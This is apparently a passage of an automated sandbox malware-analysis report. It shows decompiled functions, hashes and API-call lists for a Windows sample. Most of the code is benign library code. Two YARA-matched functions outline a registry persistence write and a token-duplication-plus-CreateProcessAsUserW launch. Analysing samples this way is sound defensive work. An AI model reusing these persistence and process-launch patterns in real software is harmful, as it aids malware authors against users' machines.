                                                                              0x0040d2af
                                                                              0x0040d2b2
                                                                              0x0040d2bc
                                                                              0x0040d2bf
                                                                              0x0040d2c4
                                                                              0x0040d2c7
                                                                              0x0040d2e2
                                                                              0x0040d2e3
                                                                              0x0040d2ea
                                                                              0x0040d2ed
                                                                              0x00000000
                                                                              0x0040d2ef
                                                                              0x0040d2f2
                                                                              0x0040d315
                                                                              0x0040d2f4
                                                                              0x0040d2fe
                                                                              0x0040d2ff
                                                                              0x0040d300
                                                                              0x0040d301
                                                                              0x0040d302
                                                                              0x0040d304
                                                                              0x0040d329
                                                                              0x0040d337
                                                                              0x0040d33c
                                                                              0x0040d341
                                                                              0x0040d347
                                                                              0x0040d343
                                                                              0x0040d343
                                                                              0x0040d343
                                                                              0x0040d34d
                                                                              0x0040d34d
                                                                              0x0040d2c9
                                                                              0x0040d2c9
                                                                              0x0040d2c9
                                                                              0x0040d2c9
                                                                              0x0040d34f
                                                                              0x0040d356
                                                                              0x0040d35d
                                                                              0x0040d369
                                                                              0x0040d371

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CreateH_prologIndirectRect
                                                                              • String ID:
                                                                              • API String ID: 2123978231-0
                                                                              • Opcode ID: 0c3c60d19b509a656745e8f4ecf286f586bea255c8da5058b13135cfd8e721dd
                                                                              • Instruction ID: ea57ef96c73db157abcf51b2fe3bf7253e0036949588745d898d95e3a42e6923
                                                                              • Opcode Fuzzy Hash: 0c3c60d19b509a656745e8f4ecf286f586bea255c8da5058b13135cfd8e721dd
                                                                              • Instruction Fuzzy Hash: 9A213B71E00219DBCB01DFE4D98499EB7B8FF08744F1080AAED01AB291C7789E45CBB6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040E468, Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E0040E468(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E0040E3EB( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L0040DC95( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}










                                                                              0x0040e46c
                                                                              0x0040e471
                                                                              0x0040e50c
                                                                              0x0040e50c
                                                                              0x0040e478
                                                                              0x0040e47e
                                                                              0x0040e492
                                                                              0x0040e492
                                                                              0x0040e495
                                                                              0x0040e4e6
                                                                              0x0040e4ec
                                                                              0x0040e4ec
                                                                              0x0040e4ef
                                                                              0x0040e4f2
                                                                              0x0040e503
                                                                              0x0040e503
                                                                              0x00000000
                                                                              0x0040e509
                                                                              0x0040e497
                                                                              0x0040e497
                                                                              0x0040e498
                                                                              0x0040e4d6
                                                                              0x0040e4d6
                                                                              0x0040e4d8
                                                                              0x0040e4da
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040e4df
                                                                              0x00000000
                                                                              0x0040e4df
                                                                              0x0040e49a
                                                                              0x0040e49a
                                                                              0x0040e49d
                                                                              0x0040e4ce
                                                                              0x00000000
                                                                              0x0040e4ce
                                                                              0x0040e49f
                                                                              0x0040e49f
                                                                              0x0040e4a0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040e4a2
                                                                              0x0040e4a2
                                                                              0x0040e4a5
                                                                              0x0040e4ad
                                                                              0x0040e4b2
                                                                              0x0040e4b5
                                                                              0x0040e4b7
                                                                              0x0040e4c0
                                                                              0x0040e4c0
                                                                              0x0040e4c6
                                                                              0x0040e4c6
                                                                              0x00000000
                                                                              0x0040e4a5
                                                                              0x0040e480
                                                                              0x0040e484
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040e487
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ArrayDestroyFreeSafeTask
                                                                              • String ID:
                                                                              • API String ID: 3253174383-0
                                                                              • Opcode ID: ce733f397ee8e04e4255276be981774e0241018d0a97f61bab80092f8f40a1bd
                                                                              • Instruction ID: 6712231b69e5409a9b39970e44f3f9bc4e9eaa71795f30219669f2762493ad86
                                                                              • Opcode Fuzzy Hash: ce733f397ee8e04e4255276be981774e0241018d0a97f61bab80092f8f40a1bd
                                                                              • Instruction Fuzzy Hash: 36118B30604206EBDB345F67DD88B67B7A8BF00351F144C3AF945AA3D0DB78D921DA58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D3E6, Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E0040D3E6(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E004128A0(E0043114F, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x44ada0;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E0042AA0D();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E0040C8B4( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x44a720;
				E0042AA72(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}








                                                                              0x0040d3eb
                                                                              0x0040d3f7
                                                                              0x0040d3fa
                                                                              0x0040d404
                                                                              0x0040d407
                                                                              0x0040d40a
                                                                              0x0040d41b
                                                                              0x0040d423
                                                                              0x0040d42c
                                                                              0x0040d441
                                                                              0x0040d44f
                                                                              0x0040d457
                                                                              0x0040d45a
                                                                              0x0040d470
                                                                              0x0040d471
                                                                              0x0040d476
                                                                              0x0040d45c
                                                                              0x0040d463
                                                                              0x0040d463
                                                                              0x0040d40c
                                                                              0x0040d416
                                                                              0x0040d416
                                                                              0x0040d479
                                                                              0x0040d480
                                                                              0x0040d487
                                                                              0x0040d493
                                                                              0x0040d49b

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$EqualH_prologIntersect
                                                                              • String ID:
                                                                              • API String ID: 2227276553-0
                                                                              • Opcode ID: 20c40cfe3995942c9c5648ee7661bbe6a095b269792c8fe24b7a9b661c83874c
                                                                              • Instruction ID: a7196cce4ed452137cb3dd0307f2a7c944c9da2468b9ab9a95a92e92d7620d15
                                                                              • Opcode Fuzzy Hash: 20c40cfe3995942c9c5648ee7661bbe6a095b269792c8fe24b7a9b661c83874c
                                                                              • Instruction Fuzzy Hash: 4A212C72900119EFDB11EFA4CA84D9EB7B8FF08355B10816AF915E3250D7349E15CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222E377, Relevance: 6.1, APIs: 4, Instructions: 62registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _snwprintf.NTDLL ref: 0222E3B5
                                                                              • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0222E3EC
                                                                              • RegSetValueExW.ADVAPI32(?,02233C10,00000000,00000001,?,00000000), ref: 0222E410
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0222E419
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 1044119080-0
                                                                              • Opcode ID: 937a0ec84626da13ef7c6348404bbaf627735cd543cde7fe8b020445dca68d92
                                                                              • Instruction ID: ba9492ff56ce980b975fface463b898b64a675b6c209768ec3a4ac5c99623df8
                                                                              • Opcode Fuzzy Hash: 937a0ec84626da13ef7c6348404bbaf627735cd543cde7fe8b020445dca68d92
                                                                              • Instruction Fuzzy Hash: 6E110CB5A50218BFE7109BE5AC89FAB736DEB48344F100575FA09D2145EA715E248AA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00424904, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00424904(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E0042D179() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}











                                                                              0x00424907
                                                                              0x0042490b
                                                                              0x00424914
                                                                              0x00424917
                                                                              0x0042491a
                                                                              0x00424921
                                                                              0x00424938
                                                                              0x00424938
                                                                              0x0042493f
                                                                              0x0042494a
                                                                              0x0042494a
                                                                              0x0042494e
                                                                              0x00424951
                                                                              0x00424959
                                                                              0x0042495b
                                                                              0x0042496a
                                                                              0x0042496e
                                                                              0x0042495d
                                                                              0x0042495d
                                                                              0x00424960
                                                                              0x00424964
                                                                              0x00424964
                                                                              0x00424977
                                                                              0x00424983
                                                                              0x00424983
                                                                              0x00424977
                                                                              0x00424989
                                                                              0x0042498e
                                                                              0x0042498e
                                                                              0x0042499a

                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0042492A
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00424932
                                                                              • LockResource.KERNEL32(00000000), ref: 00424944
                                                                              • FreeResource.KERNEL32(00000000), ref: 0042498E
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: 5d2418c4b772019cadd20ddff2a9147ef37ee7c026b283054c07160f3cb9ef8b
                                                                              • Instruction ID: 832c69868d111b4bd75ef755f22454367999f842838748fd623fbf563cb1e24d
                                                                              • Opcode Fuzzy Hash: 5d2418c4b772019cadd20ddff2a9147ef37ee7c026b283054c07160f3cb9ef8b
                                                                              • Instruction Fuzzy Hash: AA11BFBA601720EFC7209FB4E948AABF778FB44764F40446AE84253760D3B8AD84CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222E50A, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0222E439: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?,0222E4DE,00000000), ref: 0222E446
                                                                                • Part of subcall function 0222E439: lstrlenW.KERNEL32(?,?,?,?,0222E4DE,00000000), ref: 0222E44D
                                                                                • Part of subcall function 0222E439: GetTickCount.KERNEL32 ref: 0222E45D
                                                                                • Part of subcall function 0222E27E: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,0222E4EE,?,00000000), ref: 0222E298
                                                                                • Part of subcall function 0222E27E: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0222E4EE,?,00000000), ref: 0222E2AF
                                                                                • Part of subcall function 0222E27E: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0222E4EE,?,00000000), ref: 0222E2B8
                                                                                • Part of subcall function 02221DCB: WTSGetActiveConsoleSessionId.KERNEL32(?), ref: 02221DD6
                                                                                • Part of subcall function 02221DCB: DuplicateToken.ADVAPI32(?,00000002), ref: 02221DED
                                                                                • Part of subcall function 02221DCB: CloseHandle.KERNEL32(?), ref: 02221DF6
                                                                              • _snwprintf.NTDLL ref: 0222E56B
                                                                                • Part of subcall function 02221D2B: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 02221D8A
                                                                              • CloseHandle.KERNEL32(?), ref: 0222E598
                                                                              • CloseHandle.KERNEL32(?), ref: 0222E5A1
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0222E5AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateFile$ActiveConsoleCountDuplicateFolderPathProcessSessionTickTokenUserWrite_snwprintflstrlen
                                                                              • String ID:
                                                                              • API String ID: 2412347396-0
                                                                              • Opcode ID: ef72d9cd95755dfcf8d1bb12b7bb903d50b97c3b0b8a236fa7f161a0f1f543a7
                                                                              • Instruction ID: 39a5f1e584cb0867fa8cbe5fe51d649716f754c71b2c1387273bb31310143d73
                                                                              • Opcode Fuzzy Hash: ef72d9cd95755dfcf8d1bb12b7bb903d50b97c3b0b8a236fa7f161a0f1f543a7
                                                                              • Instruction Fuzzy Hash: 5711337195022DFBCB11ABE0ED049EE777DEF04305F100595E909A2199EB72AF28DFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042780B, Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042780B(intOrPtr* __ecx) {
				struct HWND__* _t14;
				intOrPtr* _t23;

				_t23 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					 *((intOrPtr*)( *__ecx + 0x16c))();
				}
				SendMessageA( *(_t23 + 0x1c), 0x1f, 0, 0);
				E00426CA2( *(_t23 + 0x1c), 0x1f, 0, 0, 1, 1);
				SendMessageA( *(E004270C8(_t23) + 0x1c), 0x1f, 0, 0);
				E00426CA2( *((intOrPtr*)(_t11 + 0x1c)), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}





                                                                              0x0042780d
                                                                              0x0042781a
                                                                              0x00427820
                                                                              0x00427820
                                                                              0x00427835
                                                                              0x00427842
                                                                              0x00427857
                                                                              0x00427864
                                                                              0x00427869
                                                                              0x00427871
                                                                              0x00000000
                                                                              0x00427878
                                                                              0x0042787d

                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00427835
                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00427857
                                                                              • GetCapture.USER32 ref: 00427869
                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00427878
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Capture
                                                                              • String ID:
                                                                              • API String ID: 1665607226-0
                                                                              • Opcode ID: 92dc45a1b99d45456cba3eaa0dc970d47fecc4feb12eeb9eb5739b29e193452e
                                                                              • Instruction ID: bc1538bc5d21434a992b24d336590cad051ba99304ed70cb5b705d525eda5016
                                                                              • Opcode Fuzzy Hash: 92dc45a1b99d45456cba3eaa0dc970d47fecc4feb12eeb9eb5739b29e193452e
                                                                              • Instruction Fuzzy Hash: 2E0162703402197FFA302F25ACC9FBB76ADEF48745F150439F7419A1D2C6A54C059564
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428FF0, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E00428FF0(void* __ecx, void* __esi) {
				void* _v8;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				if(E00424440(0x10) == 0) {
					_t30 = 0;
				} else {
					_t30 = E00428F8A(_t9, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E00429E88(GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}








                                                                              0x00428ff0
                                                                              0x00428ff3
                                                                              0x00428ff8
                                                                              0x00429002
                                                                              0x00429011
                                                                              0x00429004
                                                                              0x0042900d
                                                                              0x0042900d
                                                                              0x00429013
                                                                              0x00429024
                                                                              0x00429036
                                                                              0x0042903a
                                                                              0x00429042
                                                                              0x00429042
                                                                              0x0042904f
                                                                              0x0042904f
                                                                              0x00429057
                                                                              0x0042905d
                                                                              0x00429065

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00429024
                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 0042902A
                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 0042902D
                                                                              • GetLastError.KERNEL32(?), ref: 00429048
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 3907606552-0
                                                                              • Opcode ID: 4a8054f8e2d074c8a2766e6fad608505b143d69d6cdbe99f4948b685cf361d5c
                                                                              • Instruction ID: ab98123d3fa7c14d89c24ecc318cb74a2e0d639b37ea85ac515eb7df8dc2f3ec
                                                                              • Opcode Fuzzy Hash: 4a8054f8e2d074c8a2766e6fad608505b143d69d6cdbe99f4948b685cf361d5c
                                                                              • Instruction Fuzzy Hash: 2001D431700224BBDB109BA6ED49F5B7BA9EF84320F544026BA18CB281DBB4DC008BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00426CA2, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E00426CA2(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E0042642D();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E004269CB();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E00426CA2(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}







                                                                              0x00426cb0
                                                                              0x00426d13
                                                                              0x00426d13
                                                                              0x00426d17
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00426cb8
                                                                              0x00426ce2
                                                                              0x00426cba
                                                                              0x00426cba
                                                                              0x00426cbb
                                                                              0x00426cc2
                                                                              0x00426cc4
                                                                              0x00426cc7
                                                                              0x00426cca
                                                                              0x00426ccd
                                                                              0x00426cd0
                                                                              0x00426cd1
                                                                              0x00426cd1
                                                                              0x00426cc2
                                                                              0x00426cec
                                                                              0x00426d05
                                                                              0x00426d05
                                                                              0x00426d0d
                                                                              0x00426d0d
                                                                              0x00426d1c

                                                                              APIs
                                                                              • GetTopWindow.USER32(?), ref: 00426CB0
                                                                              • GetTopWindow.USER32(00000000), ref: 00426CEF
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00426D0D
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID:
                                                                              • API String ID: 2353593579-0
                                                                              • Opcode ID: dfdd47206f5f1ef2de75baa53a9eb16683f4db0ea9a957aaa36fce34aefa5f2a
                                                                              • Instruction ID: a58eb876f5fa42b864356ea00a36a42f8a7a189bbd2e22587ab6ee7afe7d0634
                                                                              • Opcode Fuzzy Hash: dfdd47206f5f1ef2de75baa53a9eb16683f4db0ea9a957aaa36fce34aefa5f2a
                                                                              • Instruction Fuzzy Hash: 0A014C3220112ABBCF126F92ED04EDF3B29FF14351F468012FE0051160C73AC922EBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004266F6, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E004266F6(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = GetDlgItem(_a4, _a8);
				if(_t14 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t15 = _t10;
						if(_t15 == 0) {
							goto L10;
						}
						_t10 = E004266F6(_t15, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t15, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t14) == 0) {
						L3:
						_push(_t14);
						if(_a12 == 0) {
							return E00426406(_t16);
						}
						_t10 = E0042642D();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E004266F6(_t14, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}








                                                                              0x0042670d
                                                                              0x00426711
                                                                              0x00426741
                                                                              0x00426744
                                                                              0x00426761
                                                                              0x00426761
                                                                              0x00426765
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042674f
                                                                              0x00426756
                                                                              0x0042675b
                                                                              0x00000000
                                                                              0x0042675b
                                                                              0x00000000
                                                                              0x00426756
                                                                              0x00426713
                                                                              0x00426718
                                                                              0x0042672a
                                                                              0x0042672e
                                                                              0x0042672f
                                                                              0x00000000
                                                                              0x00426731
                                                                              0x00426738
                                                                              0x0042673f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042671a
                                                                              0x00426721
                                                                              0x00426728
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00426728
                                                                              0x00426718
                                                                              0x0042676a
                                                                              0x0042676a
